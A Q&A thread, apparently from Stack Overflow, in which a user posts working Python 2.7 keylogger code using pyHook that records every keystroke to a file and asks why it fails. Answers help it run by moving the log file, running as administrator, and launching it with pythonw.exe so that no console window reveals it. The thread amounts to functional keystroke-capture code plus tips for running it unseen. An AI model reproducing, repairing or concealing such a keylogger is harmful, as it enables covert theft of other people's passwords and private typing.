# Python 2.7 keylogger

Tags: python, windows, python-2.7, cmd, keylogger

I just made a keylogger with python 2.7 but it doesn't work. Here is the keylogger code:

```
import pyHook, pythoncom, sys, logging

file_log = 'C:\keyloggeroutput.txt'

def OnKeyboardEvent(event):
    logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
    print "You pressed: ", chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()﻿
```

And this is the error i get:

```
Traceback (most recent call last):
  File "C:\Python27\lib\site-packages\pyHook\HookManager.py", line 351, in KeyboardSwitch
    return func(event)
  File "<stdin>", line 2, in OnKeyboardEvent
  File "C:\Python27\lib\logging\__init__.py", line 1547, in basicConfig
    hdlr = FileHandler(filename, mode)
  File "C:\Python27\lib\logging\__init__.py", line 913, in __init__
    StreamHandler.__init__(self, self._open())
  File "C:\Python27\lib\logging\__init__.py", line 943, in _open
    stream = open(self.baseFilename, self.mode)
IOError: [Errno 13] Permission denied: 'C:\\keyloggeroutput.txt'
```

My python folder is here:

> C:\Python27

How can I make the keylogger work?

Comment: Fix it.  (If you want more details, provide more.)

Comment: What details do you want?

Answer (score 0):

i could recommend tryin to create the file in your documents

```
IOError: [Errno 13] Permission denied: 'C:\\keyloggeroutput.txt'
```

Answer (score 0):

Try running the script with local admin privileges from windows or root in linux.
In windows you can open the powershell/cmd shell as Administrator.
In linux use the sudo command with your script: `sudo python_script.py args`

After OP's comment:
Try running it with pythonw.exe instead of python.exe like so:

```
C:\Python27\pythonw.exe your_script.pyw
```

> The PYW file type is primarily associated with 'Python' by Python
>   Software Foundation. PYW files are used in Windows to indicate a
>   script needs to be run using PYTHONW.EXE instead of PYTHON.EXE in
>   order to prevent a DOS console from popping up to display the output.
>   This patch makes it possible to import such scripts, in case they're
>   also usable as modules.

Comment: When I run  "python keylogger.pyw" in cmd as admin I get the error:   File "keylogger.pyw", line 13
    pythoncom.PumpMessages()´╗┐
                            ^
SyntaxError: invalid syntax

Comment: That didn't give me an error but I can't find the keyloggeroutput.txt file

Answer (score 0):

You cannot put the file in C:/, you should try another file location

Comment: It's a good practice to leave such short answers as a comment of the owners post.